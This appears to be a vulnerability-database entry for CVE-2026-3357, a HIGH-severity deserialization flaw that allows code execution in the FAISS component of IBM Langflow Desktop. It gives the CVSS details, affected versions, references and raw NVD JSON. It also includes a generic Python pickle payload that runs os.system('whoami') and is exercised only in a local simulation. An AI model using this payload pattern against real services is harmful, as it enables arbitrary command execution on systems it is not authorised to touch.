CVE-2026-3357

Description

IBM Langflow Desktop 1.6.0 through 1.8.2 Langflow could allow an authenticated user to execute arbitrary code on the system, caused by an insecure default setting which permits the deserialization of untrusted data in the FAISS component.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:* - VULNERABLE

IBM Langflow Desktop 1.6.0

IBM Langflow Desktop 1.6.1

IBM Langflow Desktop 1.8.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import os

# Define a class to execute system commands upon deserialization
class DeserializationExploit:
    def __reduce__(self):
        # The payload to be executed: e.g., creating a file or running a shell command
        return (os.system, ('whoami',))

# Serialize the malicious object
malicious_data = pickle.dumps(DeserializationExploit())

print(f"[+] Generated malicious payload (Length: {len(malicious_data)})")
print(f"[+] Payload bytes (hex): {malicious_data.hex()}")

# Simulation: In a real attack, send 'malicious_data' to the vulnerable FAISS endpoint.
# The server-side code would look like: pickle.loads(user_input)
# which triggers the exploit.

try:
    # Simulating the vulnerable component processing the data
    print("[+] Simulating server-side deserialization...")
    pickle.loads(malicious_data)
except Exception as e:
    print(f"[-] Error during execution: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3357
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3357
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3357/
[4] VulDB https://vuldb.com/cve/CVE-2026-3357
[5] https://www.ibm.com/support/pages/node/7268428

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3357", "sourceIdentifier": "[email protected]", "published": "2026-04-08T01:16:41.057", "lastModified": "2026-04-14T21:28:34.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Langflow Desktop 1.6.0 through 1.8.2 Langflow could allow an authenticated user to execute arbitrary code on the system, caused by an insecure default setting which permits the deserialization of untrusted data in the FAISS component."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.0", "versionEndExcluding": "1.8.3", "matchCriteriaId": "FB101015-F52D-4FE2-BBED-2CFC46ABF673"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7268428", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}